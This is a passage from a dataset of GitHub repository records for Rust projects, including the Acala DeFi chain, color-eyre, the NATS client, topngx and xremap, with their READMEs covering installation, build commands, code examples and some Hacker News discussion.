"AcalaNetwork/Acala", "link": "https://github.com/AcalaNetwork/Acala", "tags": ["substrate", "rust", "stablecoin", "polkadot", "acala", "defi", "kusama"], "stars": 684, "description": "Acala - cross-chain DeFi hub and stablecoin based on Substrate for Polkadot and Kusama.", "lang": "Rust", "repo_lang": "", "readme": "
\n\n\n[![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/AcalaNetwork/Acala/test.yml?label=Actions&logo=github)](https://github.com/AcalaNetwork/Acala/actions)\n[![GitHub tag (latest by date)](https://img.shields.io/github/v/tag/AcalaNetwork/Acala)](https://github.com/AcalaNetwork/Acala/tags)\n[![Substrate version](https://img.shields.io/badge/Substrate-2.0.0-brightgreen?logo=Parity%20Substrate)](https://substrate.io/)\n[![codecov](https://codecov.io/gh/AcalaNetwork/Acala/branch/master/graph/badge.svg?token=ERf7EDgafw)](https://codecov.io/gh/AcalaNetwork/Acala)\n[![License](https://img.shields.io/github/license/AcalaNetwork/Acala?color=green)](https://github.com/AcalaNetwork/Acala/blob/master/LICENSE)\n
\n[![Twitter URL](https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Ftwitter.com%2FAcalaNetwork)](https://twitter.com/AcalaNetwork)\n[![Discord](https://img.shields.io/badge/Discord-gray?logo=discord)](https://www.acala.gg/)\n[![Telegram](https://img.shields.io/badge/Telegram-gray?logo=telegram)](https://t.me/AcalaOfficial)\n[![Discourse](https://img.shields.io/badge/Forum-gray?logo=discourse)](https://acala.discourse.group/)\n[![Medium](https://img.shields.io/badge/Medium-gray?logo=medium)](https://medium.com/acalanetwork)\n\n
\n\n\n\n- [1. Introduction](#1-introduction)\n- [2. Overview](#2-overview)\n - [2.1. aUSD and the Honzon stablecoin protocol](#21-ausd-and-the-honzon-stablecoin-protocol)\n - [2.2. Acala Network Economic Model](#22-acala-network-economic-model)\n- [3. Building](#3-building)\n- [4. Run](#4-run)\n- [5. Development](#5-development)\n- [6. Bug Bounty :bug:](#6-bug-bounty-bug)\n\n\n\n# 1. Introduction\nThis project is initiated and facilitated by the Acala Foundation. The Acala Foundation nurtures applications in the field of decentralized finance protocols, particularly those that serve as open finance infrastructure, such as stable currency and staking liquidity. The Acala Foundation was founded by [Laminar](https://laminar.one/) and [Polkawallet](https://polkawallet.io/), participants in and contributors to the Polkadot ecosystem. The Acala Foundation welcomes more industry participants as it progresses.\n\n# 2. Overview\nThe significance of cross-chain communication to the blockchain is like that of the internet to the intranet. Polkadot empowers a network of public, consortium and private blockchains, and enables true interoperability as well as economic and transactional scalability. A cross-chain stablecoin system will:\n1. Create a sound, stable currency for low cost, borderless value transfer for all chains in the network\n2. Enable commercial lending with predictable risk\n3. Serve as a building block for more open finance services\n\nThe Acala Dollar stablecoin (ticker: aUSD) is a multi-collateral-backed cryptocurrency whose value is stable against the US Dollar (a 1:1 aUSD-to-USD soft peg). It is completely decentralized: it can be created using assets from blockchains connected to the Polkadot network, including Ethereum and Bitcoin, as collateral, and can be used by any chain (or digital jurisdiction) within the Polkadot network and applications on those chains.\n\nBy this nature, it is essential that the Acala Network eventually become community-owned, with an economic model that can sustain its development and participation in the Polkadot network, as well as ensure its stability and security. The following sections provide a high-level overview of these topics:\n- aUSD and the Honzon stablecoin protocol\n- the economic model and initial parachain offering\n\n## 2.1. aUSD and the Honzon stablecoin protocol\nEvery aUSD is backed in excess by a crypto asset, a mechanism known as an over-collateralized debt position (or CDP). These CDPs, together with a set of incentive, supply-and-demand balancing, and risk management mechanisms, form the core components of the Honzon stablecoin protocol on the Acala Network and ensure the stability of the aUSD. The CDP mechanism design is inspired by the first decentralized stablecoin project, MakerDAO, which has become a DeFi building block in the Ethereum ecosystem. Beyond that, the Honzon protocol enables many unique features - native multi-asset support, cross-chain stablecoin capability, automatic liquidation to increase responsiveness to risk, and pluggable oracle and auction house to improve modularity, just to name a few.\n\nThe Honzon protocol contains the following components:\n- Multi Collateral Type\n- Collateral Adapter\n- Oracle and Prices\n- Auction and Auction Manager\n- CDP and CDP Engine\n- Emergency shutdown\n- Governance\n- Honzon as an interface to other components\n\nNote: This section is still a work in progress; we will add more information as we go. Refer to the [Github Wiki](https://github.com/AcalaNetwork/Acala/wiki) for more details.
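Since the CDP mechanics above are abstract, here is a deliberately simplified toy sketch of the safety check at the heart of an over-collateralized position; this is for illustration only and is not Acala's actual runtime logic or types:\n\n```rust\n/// Toy model: a position is safe while the market value of its collateral,\n/// relative to the aUSD debt it backs, stays at or above the required\n/// liquidation ratio (e.g. 150% = 1.5).\nfn position_is_safe(collateral_value_usd: f64, debt_ausd: f64, liquidation_ratio: f64) -> bool {\n debt_ausd == 0.0 || collateral_value_usd / debt_ausd >= liquidation_ratio\n}\n\nfn main() {\n // $300 of collateral backing 150 aUSD at a 150% ratio is safe...\n assert!(position_is_safe(300.0, 150.0, 1.5));\n // ...but if the collateral's market value falls to $200, the position\n // becomes eligible for automatic liquidation.\n assert!(!position_is_safe(200.0, 150.0, 1.5));\n}\n```\n\n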
\n\n## 2.2. Acala Network Economic Model\nThe Acala Network Token (ACA) features the following utilities, and the value of the ACA token will accrue with increased usage of the network and revenue from stability fees and liquidation penalties:\n1. As Network Utility Token: to pay for network fees and stability fees\n2. As Governance Token: to vote for/against risk parameters and network change proposals\n3. As Economic Capital: in case of liquidation without sufficient collateral\n\nTo enable cross-chain functionality, the Acala Network will connect to Polkadot in one of three ways:\n1. as a parathread - a pay-as-you-go connection to Polkadot\n2. as a parachain - a permanent connection for a given period\n3. as an independent chain with a bridge back to Polkadot\n\nBecoming a parachain would be an ideal option to bootstrap the Acala Network and maximize its benefits and its reach to other chains and applications on the Polkadot network. To secure a parachain slot, the Acala Network will require supportive DOT holders to lock their DOTs to bid for a slot collectively - a process known as the Initial Parachain Offering (IPO). ACA tokens will be offered as a reward to those who participate in the IPO, as compensation for the opportunity cost of staking their DOTs.\n\nNote: This section is still a work in progress; we will add more information as we go. Refer to the [token economy working paper](https://github.com/AcalaNetwork/Acala-white-paper) for more details.\n\n# 3. Building\n\n## NOTE\n\nTo connect to the \"Mandala TC6\" network, you will want version `~0.7.10` of the code, which is in this repo.\n\n- **Mandala TC6** is in [Acala repo master branch](https://github.com/AcalaNetwork/Acala/tree/master/).\n\nInstall Rust:\n\n```bash\ncurl https://sh.rustup.rs -sSf | sh\n```\n\nYou may need additional dependencies; check out [substrate.io](https://docs.substrate.io/v3/getting-started/installation) for more info:\n\n```bash\nsudo apt-get install -y git clang curl libssl-dev llvm libudev-dev protobuf-compiler\n```\n\nMake sure you have `submodule.recurse` set to true to make life with submodules easier.\n\n```bash\ngit config --global submodule.recurse true\n```\n\nInstall required tools and install git hooks:\n\n```bash\nmake init\n```\n\nBuild Mandala TC native code:\n\n```bash\nmake build-full\n```\n\n# 4. Run\n\nYou can start a development chain with:\n\n```bash\nmake run\n```\n\n# 5. Development\n\nTo type check:\n\n```bash\nmake check-all\n```\n\nTo purge old chain data:\n\n```bash\nmake purge\n```\n\nTo purge old chain data and run:\n\n```bash\nmake restart\n```\n\nUpdate ORML:\n\n```bash\nmake update\n```\n\n__Note:__ All build commands in the Makefile are designed for local development purposes, and hence have `SKIP_WASM_BUILD` enabled to speed up build time and use `--execution native` to run only in native execution mode.\n\n# 6. Bug Bounty :bug:\n\nThe Bug Bounty Program includes only on-chain vulnerabilities that can lead to significant economic loss or instability of the network. You can check the details of the Bug Bounty or submit a vulnerability here:\nhttps://immunefi.com/bounty/acala/\n\n
# 7. Bench Bot\nBench bot can take care of syncing a branch with `master` and generating WeightInfos for a module or runtime.\n\n## Generate module weights\n\nComment on a PR `/bench module <module_name>` i.e.: `module_currencies`\n\nBench bot will do the benchmarking, generate a `weights.rs` file and push the changes to your branch.\n\n## Generate runtime weights\n\nComment on a PR `/bench runtime <runtime> <module_name>` i.e.: `/bench runtime mandala module_currencies`.\n\nTo generate weights for all modules just pass `*` as `module_name` i.e: `/bench runtime mandala *`\n\nBench bot will do the benchmarking, generate the weights file and push the changes to your branch.\n\n## Bench Acala EVM+\n\nComment on a PR `/bench evm` to benchmark Acala EVM+, and bench bot will generate precompile weights and the GasToWeight ratio.\n\n\n# 8. Migration testing runtime\nIf you modify storage, you should test the data migration before upgrading the runtime.\n\n## Try testing runtime\n\ntry-runtime on karura:\n\n```bash\n# Use a live chain to run the migration test.\n# Adding `-p module_name` specifies the module.\nmake try-runtime-karura\n\n# Create a state snapshot to run the migration test.\n# Adding `--pallet module_name` specifies the module.\ncargo run --features with-karura-runtime --features try-runtime -- try-runtime --runtime existing create-snapshot --uri wss://karura.api.onfinality.io:443/public-ws karura-latest.snap\n\n# Use a state snapshot to run the migration test.\n./target/release/acala try-runtime --runtime ./target/release/wbuild/karura-runtime/karura_runtime.compact.compressed.wasm --chain=karura-dev on-runtime-upgrade snap -s karura-latest.snap\n```\n\ntry-runtime on acala:\n\n```bash\n# Use a live chain to run the migration test.\n# Adding `--pallet module_name` specifies the module.\nmake try-runtime-acala\n\n# Create a state snapshot to run the migration test.\n# Adding `--pallet module_name` specifies the module.\ncargo run --features with-acala-runtime --features try-runtime -- try-runtime --runtime existing create-snapshot --uri wss://acala.api.onfinality.io:443/public-ws acala-latest.snap\n\n# Use a state snapshot to run the migration test.\n./target/release/acala try-runtime --runtime ./target/release/wbuild/acala-runtime/acala_runtime.compact.compressed.wasm --chain=acala-dev on-runtime-upgrade snap -s acala-latest.snap\n```\n\n# 9. Run local testnet with [parachain-launch](https://github.com/open-web3-stack/parachain-launch)\nBuild a local RelayChain and Parachain testnet for development.\n\n```bash\ncd launch\n\n# install dependencies\nyarn\n\n# generate docker-compose.yml and genesis\n# NOTE: If the docker image is not the latest, you need to download it manually.\n# e.g.: docker pull acala/karura-node:latest\n# karura testnet:\nyarn start generate\n# karura-bifrost testnet:\nyarn start generate --config=karura-bifrost.yml\n\n# start relaychain and parachain\ncd output\n# NOTE: If you regenerate the output directory, you need to rebuild the images.\ndocker-compose up -d --build\n\n# list all of the containers.\ndocker ps -a\n\n# track container logs\ndocker logs -f [container_id/container_name]\n\n# stop all of the containers.\ndocker-compose stop\n\n# remove all of the containers.\ndocker-compose rm\n\n# NOTE: If you want to clear the data and restart, you need to clear the volumes.\n# remove volume\ndocker volume ls\ndocker volume rm [volume_name]\n# prune all volumes\ndocker volume prune\n```\n\n
# 10. Build For Release\n\nFor release artifacts, a more optimized build config is used.\nThis config takes around 2x to 3x longer to build, but produces a more optimized binary to run.\n\n```bash\nmake build-release\n```\n\n# 11. Setup Local EVM+ Test Environment\n\nTo set up a basic local network you need two things running locally: a node and the eth-rpc-adapter. Set up each service in its own terminal and then you are free to use your favorite EVM tools locally! (e.g. Hardhat)\n\n## Setting up a local node\n\n#### Compile the node from source code:\n\n```bash\nmake run\n```\n\nNote: You may need normal block production for certain workflows; use the command below to run the node without the instant-sealing flag:\n\n```bash\ncargo run --features with-mandala-runtime -- --dev -lruntime=debug\n```\n\n#### Run node using docker:\n\n```bash\ndocker run -it --rm -p 9944:9944 -p 9933:9933 ghcr.io/acalanetwork/mandala-node:master --dev --ws-external --rpc-port=9933 --rpc-external --rpc-cors=all --rpc-methods=unsafe --tmp -levm=debug --instant-sealing\n```\n\n## Setting up eth-rpc-adapter\n\n```bash\nnpx @acala-network/eth-rpc-adapter -l 1\n```\n\nNote: If your use case needs the `eth_getLogs` RPC call, then you need a subquery instance to index the local chain. In that case, follow the tutorial found here: [Local Network Tutorial](https://evmdocs.acala.network/network/network-setup/local-development-network)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "yaahc/color-eyre", "link": "https://github.com/yaahc/color-eyre", "tags": [], "stars": 684, "description": "Custom hooks for colorful human oriented error reports via panics and the eyre crate", "lang": "Rust", "repo_lang": "", "readme": "## color-eyre\n\n[![Build Status][actions-badge]][actions-url]\n[![Latest Version][version-badge]][version-url]\n[![Rust Documentation][docs-badge]][docs-url]\n\n[actions-badge]: https://github.com/yaahc/color-eyre/workflows/Continuous%20integration/badge.svg\n[actions-url]: https://github.com/yaahc/color-eyre/actions?query=workflow%3A%22Continuous+integration%22\n[version-badge]: https://img.shields.io/crates/v/color-eyre.svg\n[version-url]: https://crates.io/crates/color-eyre\n[docs-badge]: https://img.shields.io/badge/docs-latest-blue.svg\n[docs-url]: https://docs.rs/color-eyre\n\nAn error report handler for panics and the [`eyre`] crate for colorful, consistent, and well\nformatted error reports for all kinds of errors.\n\n## TLDR\n\n`color_eyre` helps you build error reports that look like this:\n\n![custom section example](https://raw.githubusercontent.com/yaahc/color-eyre/master/pictures/custom_section.png)\n\n## Setup\n\nAdd the following to your toml file:\n\n```toml\n[dependencies]\ncolor-eyre = \"0.6\"\n```\n\nAnd install the panic and error report handlers:\n\n```rust\nuse color_eyre::eyre::Result;\n\nfn main() -> Result<()> {\n color_eyre::install()?;\n\n // ...\n # Ok(())\n}\n```\n\n### Disabling tracing support\n\nIf you don't plan on using `tracing_error` and `SpanTrace` you can disable the\ntracing integration to cut down on unused dependencies:\n\n```toml\n[dependencies]\ncolor-eyre = { version = \"0.6\", default-features = false }\n```\n\n### Disabling SpanTrace capture by default\n\ncolor-eyre defaults to capturing span traces. This is because `SpanTrace`\ncapture is significantly cheaper than `Backtrace` capture. However, like
However, like\nbacktraces, span traces are most useful for debugging applications, and it's\nnot uncommon to want to disable span trace capture by default to keep noise out\ndeveloper.\n\nTo disable span trace capture you must explicitly set one of the env variables\nthat regulate `SpanTrace` capture to `\"0\"`:\n\n```rust\nif std::env::var(\"RUST_SPANTRACE\").is_err() {\n std::env::set_var(\"RUST_SPANTRACE\", \"0\");\n}\n```\n\n### Improving perf on debug builds\n\nIn debug mode `color-eyre` behaves noticably worse than `eyre`. This is caused\nby the fact that `eyre` uses `std::backtrace::Backtrace` instead of\n`backtrace::Backtrace`. The std version of backtrace is precompiled with\noptimizations, this means that whether or not you're in debug mode doesn't\nmatter much for how expensive backtrace capture is, it will always be in the\n10s of milliseconds to capture. A debug version of `backtrace::Backtrace`\nhowever isn't so lucky, and can take an order of magnitude more time to capture\na backtrace compared to its std counterpart.\n\nCargo [profile\noverrides](https://doc.rust-lang.org/cargo/reference/profiles.html#overrides)\ncan be used to mitigate this problem. By configuring your project to always\nbuild `backtrace` with optimizations you should get the same performance from\n`color-eyre` that you're used to with `eyre`. To do so add the following to\nyour Cargo.toml:\n\n```toml\n[profile.dev.package.backtrace]\nopt-level = 3\n```\n\n## Features\n\n### Multiple report format verbosity levels\n\n`color-eyre` provides 3 different report formats for how it formats the captured `SpanTrace`\nand `Backtrace`, minimal, short, and full. Take the below snippets of the output produced by [`examples/usage.rs`]:\n\n---\n\nRunning `cargo run --example usage` without `RUST_LIB_BACKTRACE` set will produce a minimal\nreport like this:\n\n![minimal report format](https://raw.githubusercontent.com/yaahc/color-eyre/master/pictures/minimal.png)\n\n
\n\nRunning `RUST_LIB_BACKTRACE=1 cargo run --example usage` tells `color-eyre` to use the short\nformat, which additionally captures a [`backtrace::Backtrace`]:\n\n![short report format](https://raw.githubusercontent.com/yaahc/color-eyre/master/pictures/short.png)\n\n
\n\nFinally, running `RUST_LIB_BACKTRACE=full cargo run --example usage` tells `color-eyre` to use\nthe full format, which in addition to the above will attempt to include source lines where the\nerror originated from, assuming it can find them on the disk.\n\n![full report format](https://raw.githubusercontent.com/yaahc/color-eyre/master/pictures/full.png)\n\n### Custom `Section`s for error reports via [`Section`] trait\n\nThe `section` module provides helpers for adding extra sections to error\nreports. Sections are distinct from error messages and are displayed\nindependently from the chain of errors. Take this example of adding sections\nto contain `stderr` and `stdout` from a failed command, taken from\n[`examples/custom_section.rs`]:\n\n```rust\nuse color_eyre::{eyre::eyre, SectionExt, Section, eyre::Report};\nuse std::process::Command;\nuse tracing::instrument;\n\ntrait Output {\n fn output2(&mut self) -> Result<String, Report>;\n}\n\nimpl Output for Command {\n #[instrument]\n fn output2(&mut self) -> Result<String, Report> {\n let output = self.output()?;\n\n let stdout = String::from_utf8_lossy(&output.stdout);\n\n if !output.status.success() {\n let stderr = String::from_utf8_lossy(&output.stderr);\n Err(eyre!(\"cmd exited with non-zero status code\"))\n .with_section(move || stdout.trim().to_string().header(\"Stdout:\"))\n .with_section(move || stderr.trim().to_string().header(\"Stderr:\"))\n } else {\n Ok(stdout.into())\n }\n }\n}\n```\n\n---\n\nHere we have a function that, if the command exits unsuccessfully, creates a\nreport indicating the failure and attaches two sections, one for `stdout` and\none for `stderr`.\n\nRunning `cargo run --example custom_section` shows us how these sections are\nincluded in the output:\n\n![custom section example](https://raw.githubusercontent.com/yaahc/color-eyre/master/pictures/custom_section.png)\n\nOnly the `Stderr:` section actually gets included. The `cat` command fails,\nso stdout ends up being empty and is skipped in the final report. This gives\nus a short and concise error report indicating exactly what was attempted and\nhow it failed.\n\n### Aggregating multiple errors into one report\n\nIt's not uncommon for programs like batched task runners or parsers to want\nto return an error with multiple sources. The current version of the error\ntrait does not support this use case very well, though there is [work being\ndone](https://github.com/rust-lang/rfcs/pull/2895) to improve this.\n\nFor now, however, one way to work around this is to compose errors outside the\nerror trait. `color-eyre` supports such composition in its error reports via\nthe `Section` trait.\n\nFor an example of how to aggregate errors check out [`examples/multiple_errors.rs`].\n\n
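As a taste of what that looks like, here is a sketch in the spirit of that example (our own simplification, using `std::io::Error` as the source error type):\n\n```rust\nuse color_eyre::{eyre::eyre, eyre::Report, Section};\n\n// Collapse any number of source errors into one report, attaching each\n// failure to the report as its own error section.\nfn join_errors(errors: Vec<std::io::Error>) -> Result<(), Report> {\n if errors.is_empty() {\n return Ok(());\n }\n errors\n .into_iter()\n .fold(Err(eyre!(\"encountered multiple errors\")), |report, e| {\n report.error(e)\n })\n}\n```\n\n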
### Custom configuration for `color-backtrace` for setting custom filters and more\n\nThe pretty printing for backtraces and span traces isn't actually provided by\n`color-eyre`, but instead comes from its dependencies [`color-backtrace`] and\n[`color-spantrace`]. `color-backtrace` in particular has many more features\nthan are exported by `color-eyre`, such as customized color schemes, panic\nhooks, and custom frame filters. The custom frame filters are particularly\nuseful when combined with `color-eyre`, so to enable their usage we provide\nthe `install` fn for setting up a custom `BacktracePrinter` with custom\nfilters installed.\n\nFor an example of how to set up custom filters, check out [`examples/custom_filter.rs`].\n\n[`eyre`]: https://docs.rs/eyre\n[`tracing-error`]: https://docs.rs/tracing-error\n[`color-backtrace`]: https://docs.rs/color-backtrace\n[`eyre::EyreHandler`]: https://docs.rs/eyre/*/eyre/trait.EyreHandler.html\n[`backtrace::Backtrace`]: https://docs.rs/backtrace/*/backtrace/struct.Backtrace.html\n[`tracing_error::SpanTrace`]: https://docs.rs/tracing-error/*/tracing_error/struct.SpanTrace.html\n[`color-spantrace`]: https://github.com/yaahc/color-spantrace\n[`Section`]: https://docs.rs/color-eyre/*/color_eyre/section/trait.Section.html\n[`eyre::Report`]: https://docs.rs/eyre/*/eyre/struct.Report.html\n[`eyre::Result`]: https://docs.rs/eyre/*/eyre/type.Result.html\n[`Handler`]: https://docs.rs/color-eyre/*/color_eyre/struct.Handler.html\n[`examples/usage.rs`]: https://github.com/yaahc/color-eyre/blob/master/examples/usage.rs\n[`examples/custom_filter.rs`]: https://github.com/yaahc/color-eyre/blob/master/examples/custom_filter.rs\n[`examples/custom_section.rs`]: https://github.com/yaahc/color-eyre/blob/master/examples/custom_section.rs\n[`examples/multiple_errors.rs`]: https://github.com/yaahc/color-eyre/blob/master/examples/multiple_errors.rs\n\n#### License\n\n\nLicensed under either of Apache License, Version\n2.0 or MIT license at your option.\n\n\n
\n\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in this crate by you, as defined in the Apache-2.0 license, shall\nbe dual licensed as above, without any additional terms or conditions.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nats-io/nats.rs", "link": "https://github.com/nats-io/nats.rs", "tags": ["cloud-native", "messaging", "messaging-library", "microservices", "nats", "rust"], "stars": 684, "description": "Rust client for NATS, the cloud native messaging system.", "lang": "Rust", "repo_lang": "", "readme": "
A Rust client for the NATS messaging system.\n
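As a quick taste before the details below, here is a publish/subscribe sketch against the async client; this is our own minimal example written against `async-nats`' public API, not an official snippet from the repo:\n\n```rust\nuse futures::StreamExt;\n\n#[tokio::main]\nasync fn main() -> Result<(), async_nats::Error> {\n // Connect to a public demo server (swap in your own URL).\n let client = async_nats::connect(\"demo.nats.io\").await?;\n\n // Subscribe first, then publish a message to a matching subject.\n let mut subscriber = client.subscribe(\"greet.joe\".into()).await?;\n client.publish(\"greet.joe\".into(), \"hello\".into()).await?;\n\n if let Some(message) = subscriber.next().await {\n println!(\"received on {}: {:?}\", message.subject, message.payload);\n }\n Ok(())\n}\n```\n\n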
\n\n## Motivation\n\nRust may be one of the most interesting new languages the NATS ecosystem has seen.\nWe believe this client will have a large impact on NATS, distributed systems, and\nembedded and IoT environments. With Rust, we wanted to be as idiomatic as we\ncould be and lean into the strengths of the language. We moved many things that\nwould have been runtime checks and errors to the compiler, most notably options\non connections, and having subscriptions generate multiple styles of iterators\nsince iterators are first-class citizens in Rust. We also wanted to be aligned\nwith the NATS philosophy of simple, secure, and fast!\n\n## Clients\n\nThere are two clients available in two separate crates:\n\n### async-nats\n\n[![License Apache 2](https://img.shields.io/badge/License-Apache2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0)\n[![Crates.io](https://img.shields.io/crates/v/async-nats.svg)](https://crates.io/crates/async-nats)\n[![Documentation](https://docs.rs/async-nats/badge.svg)](https://docs.rs/async-nats/)\n[![Build Status](https://github.com/nats-io/nats.rs/workflows/Rust/badge.svg)](https://github.com/nats-io/nats.rs/actions)\n\nNew async Tokio-based NATS client.\n\nSupports:\n\n* Core NATS\n* JetStream API\n* JetStream Management API\n* Key Value Store\n* Object Store\n\nAny feedback related to this client is welcome.\n\n> **Note:** the async client is still pre-1.0.0 and will introduce breaking changes.\n\n### nats\n\n[![License Apache 2](https://img.shields.io/badge/License-Apache2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0)\n[![Crates.io](https://img.shields.io/crates/v/nats.svg)](https://crates.io/crates/nats)\n[![Documentation](https://docs.rs/nats/badge.svg)](https://docs.rs/nats/)\n[![Build Status](https://github.com/nats-io/nats.rs/workflows/Rust/badge.svg)](https://github.com/nats-io/nats.rs/actions)\n\nLegacy *synchronous* client that supports:\n\n* Core NATS\n* JetStream API\n* JetStream Management API\n* Key Value Store\n* Object Store\n\nThis client will be deprecated soon after `async-nats` reaches version 1.0 and gains a sync wrapper around it.\n\n### Documentation\n\nPlease refer to each crate's docs for API reference and examples.\n\n## Feedback\n\nWe encourage all folks in the NATS and Rust ecosystems to help us\nimprove this library. Please open issues, submit PRs, etc. We're\navailable in the `rust` channel on [the NATS slack](https://slack.nats.io)\nas well!\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gsquire/topngx", "link": "https://github.com/gsquire/topngx", "tags": ["rust", "nginx", "command-line"], "stars": 683, "description": "top for NGINX", "lang": "Rust", "repo_lang": "", "readme": "# topngx\n[![CI](https://github.com/gsquire/topngx/workflows/CI/badge.svg)](https://github.com/gsquire/topngx/actions)\n\nThis tool is a rewrite of [ngxtop](https://github.com/lebinh/ngxtop) to make it easier to install\nand hopefully run faster. For those unfamiliar with ngxtop, it is a tool that helps you\nparse NGINX access logs and print various statistics from them regardless of format. It is\ncurrently not as feature-complete as the original version but it should have enough functionality\nto be usable.\n\n![screenshot](screenshot.png)\n\n## Installation\nThere are a few ways to install it. 
The easiest way is to grab a release from [here](https://github.com/gsquire/topngx/releases).\nOtherwise, you can install it from [crates.io](https://crates.io/crates/topngx) with a working Rust\ninstallation:\n\n```sh\ncargo install topngx\n\n# If you do not have SQLite headers installed on your system, you can use the bundled feature.\ncargo install topngx --features bundled-sqlite\n```\n\nSQLite development headers are easy to get on Mac and Linux:\n\n```sh\n# On Mac.\nbrew install sqlite\n\n# On Debian based Linux.\nsudo apt-get update && sudo apt-get install libsqlite3-dev\n```\n\n## CHANGELOG\n[See here](CHANGELOG.md)\n\n## Usage\n```sh\ntopngx 0.3.0\nGarrett Squire \ntop for NGINX\n\nUSAGE:\n topngx [FLAGS] [OPTIONS] [SUBCOMMAND]\n\nFLAGS:\n -t, --follow Tail the specified log file. You cannot tail standard input\n -h, --help Prints help information\n -V, --version Prints version information\n\nOPTIONS:\n -a, --access-log <access-log> The access log to parse\n -f, --format <format> The specific log format with which to parse [default: combined]\n -g, --group-by <group-by> Group by this variable [default: request_path]\n -w, --having <having> Having clause [default: 1]\n -i, --interval <interval> Refresh the statistics using this interval which is given in seconds [default: 2]\n -l, --limit <limit> The number of records to limit for each query [default: 10]\n -o, --order-by <order-by> Order of output for the default queries [default: count]\n\nSUBCOMMANDS:\n avg Print the average of the given fields\n help Prints this message or the help of the given subcommand(s)\n info List the available fields as well as the access log and format being used\n print Print out the supplied fields with the given limit\n query Supply a custom query\n sum Compute the sum of the given fields\n top Find the top values for the given fields\n```\n\nSome example queries are:\n\n```sh\n# Run with the default queries and format (combined).\n# Or use the --access-log and --no-follow flags if you do not want to read from standard input.\ntopngx < /path/to/access.log\n\n# Output:\ncount avg_bytes_sent 2XX 3XX 4XX 5XX\n2 346.5 2 0 0 0\nrequest_path count avg_bytes_sent 2XX 3XX 4XX 5XX\nGET / HTTP/1.1 1 612 1 0 0 0\nGET /some_file1 HTTP/1.1 1 81 1 0 0 0\n\n# See the fields that you can use for queries.\ntopngx info < access.log\n\n# Use a custom log format.\ntopngx -f '$remote_addr - $remote_user [$time_local] \"$request\" $status $bytes_sent' info\n\n# Output:\naccess log file: STDIN\naccess log format: $remote_addr - $remote_user [$time_local] \"$request\" $status $bytes_sent\navailable variables to query: remote_addr, remote_user, time_local, request_path, status_type, bytes_sent\n\n# Run a custom query.\n# The fields passed in can be viewed via the info sub command.\ntopngx query -q 'select * from log where bytes_sent > 100' -f request_path bytes_sent < access.log\n```\n\n## Limitations\nThere is no option to filter the data but this could be added in the future. The original version\nallowed for automatic detection of NGINX configuration files, log file paths, and log format styles.\ntopngx currently has command line options for these and may add this functionality in a later version.\n\nIf you find any other issues or features that may be missing, feel free to open an issue. 
You can\nalso utilize logging via the [env_logger](https://github.com/sebasmagri/env_logger/) crate.\n\n```sh\n# See the env_logger README for the various levels.\nRUST_LOG=debug topngx < /path/to/access.log\n```\n\n## License\nMIT\n\nThe ngxtop license can be seen [here](https://github.com/lebinh/ngxtop/blob/master/LICENSE.txt).\n", "readme_type": "markdown", "hn_comments": "Maybe not as lightweight, but GoAccess (https://github.com/allinurl/goaccess) does an awesome job at parsing the logs and displaying statistics, works for nginx and other webservers tooI wouldn't mind a screenshot before installing it.My last company had something like that and included response time percentiles (50th, 90th, 95th, 99th) and we had these values graphed and displayed on a big screen in our office. Along with a ton of other performance stats: queries per second, various measures of system load, etc.Averages can lie, especially when something like an empty query can take close to zero time compared to a non-trivial transaction. If some robot or other artifact of your site is generating a some amount of null queries that will make your average response time look better than it actually is. Percentiles, particularly on the tail of 90th or above, tell a better story of how well and consistently you're responding to traffic under load.This is the tool I've wanted (and half written 3-4 times) my whole career. From reading the github it looks lightweight, not a big infrastructure addition, and that it helps you figure out wtf is going on with the web server.Regarding the branding, for me top is a real-time tool rather than a logging tool. I was picturing something that may have been more useful for older style Apache httpd installs where you have several virtual hosts on a server and you'd want to know who is hogging the resources or causing the problems.Monitoring capabilities are missing from Nginx on purpose. They are not and will never be available for free because there is \"NGINX Plus\".This is why I recommend switching to HAProxy.How does this compare to goaccess? Similar tool that I've used briefly. One issue I had was how complicated it was, I'm assuming since this is nginx specific it's simpler.> This tool is a rewrite of ngxtop to make it more easily installed and hopefully quicker.Why make a whole new tool with limitations instead of improving the existing one?Hmmm... looks like nothing more than a weblog analyzer. Someone correct me if I'm wrong. It's not \"real time\" since it can only report on what the web-server has done not what it is doing. AFAIK, nginx has nothing like Apache httpd's mod_status... at least, nothing open source.Interesting, but I would have thought \"top\" for nginx would be a tool that shows you all the connections, paths, and resource usage live, like the \"top\" command. Is there a tool that does that?>a rewrite of ngxtop to make it more easily installed and hopefully quicker.What world does this guy live in that a program in Rust is easier to get running on any random machine than python script?I made something similar in Python [0], but for parsing the error_log directive. 
Just for the odd time you need to parse that.[0] https://github.com/madsmtm/nginx-error-log", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "k0kubun/xremap", "link": "https://github.com/k0kubun/xremap", "tags": ["linux", "keyboard-shortcuts", "x11", "wayland"], "stars": 683, "description": "Key remapper for X11 and Wayland", "lang": "Rust", "repo_lang": "", "readme": "# \ud835\udc4b\ud835\udc5f\ud835\udc52\ud835\udc5a\ud835\udc4e\ud835\udc5d :keyboard: [![cargo](https://github.com/k0kubun/xremap/actions/workflows/build.yml/badge.svg)](https://github.com/k0kubun/xremap/actions/workflows/build.yml)\n\n`xremap` is a key remapper for Linux. Unlike `xmodmap`, it supports app-specific remapping and Wayland.\n\n## Concept\n\n* **Fast** - Xremap is written in Rust, which is faster than JIT-less interpreters like Python.\n\n* **Cross-platform** - Xremap uses `evdev` and `uinput`, which works whether you use X11 or Wayland.\n\n* **Language-agnostic** - The config is JSON-compatible. Generate it from any language,\n e.g. [Ruby](https://github.com/xremap/xremap-ruby), [Python](https://github.com/xremap/xremap-python).\n\n## Features\n\n* Remap any keys, e.g. Ctrl or CapsLock.\n* Remap any key combination to another, even to a key sequence.\n* Remap a key sequence as well. You could do something like Emacs's `C-x C-c`.\n* Remap a key to two different keys depending on whether it's pressed alone or held.\n* Application-specific remapping. Even if it's not supported by your application, xremap can.\n* Automatically remap newly connected devices by starting xremap with `--watch`.\n* Support 